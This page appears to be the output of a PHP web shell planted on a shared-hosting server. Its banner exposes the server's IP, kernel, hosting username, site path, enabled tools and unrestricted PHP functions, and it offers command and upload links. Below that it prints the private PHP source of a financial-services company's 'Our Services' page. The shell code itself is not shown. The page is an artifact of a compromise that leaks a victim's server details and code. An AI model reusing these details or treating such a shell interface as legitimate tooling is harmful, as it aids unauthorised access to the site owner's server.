Server IP : 103.53.40.154 / Your IP : 3.135.206.25 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/hafinserv.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en"> <head> <?php include "top-links.php"; ?> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title><?php echo $datah['meta_title'] ?></title> <meta name="description" content=" <?php echo $datah['meta_desc']?>"/> </head> <body> <?php include "header.php"; ?> <div class="pagehding-sec"> <div class="pagehding-overlay"></div> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="page-heading" > <h1>Our Services</h1> <ul> <li><a href="<?php echo $wspath ?>">Home</a></li> <li><a href="<?php echo $wspath ?>services.html">Our Services</a></li> </ul> </div> </div> </div> </div> </div> <div class="service2-sec pt-50 pb-50"> <div class="container"> <div class="row"> <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12"> <div class="sec-title" style="text-align:center;"> <h2> <span>Our</span> Services</h2> <p style="color:black;">"Investment planning, retirement strategies, tax optimization, insurance guidance, financial education."</p> </div> </div> </div> <div class="row"> <div class="service2-item"> <?php $sqls = "SELECT * FROM tbl_product"; $querys = mysqli_query($db,$sqls); while($datas = mysqli_fetch_assoc($querys)){ ?> <div class="col-md-4 col-sm-6"> <div class="service-inner"> <div class="service-img" style="background-image: url('<?php echo $wspath ?>admin/images/services/<?php echo $datas['image'] ?>'); background-size: cover; background-position: center center;"> </div> <div class="service-details"> <h2><a href="<?php echo $wspath?>services<?php echo $datas['slug_link']?>.html"><?php echo $datas['product_name'] ?></a></h2> <p><?php echo substr($datas['product_detail'],0,150)?>... <a href="<?php echo $wspath?>services<?php echo $datas['slug_link']?>.html">Read More</a></p> </div> </div> </div> <?php } ?> </div> </div> </div> </div> <?php include "footer.php"; ?> </body> </html>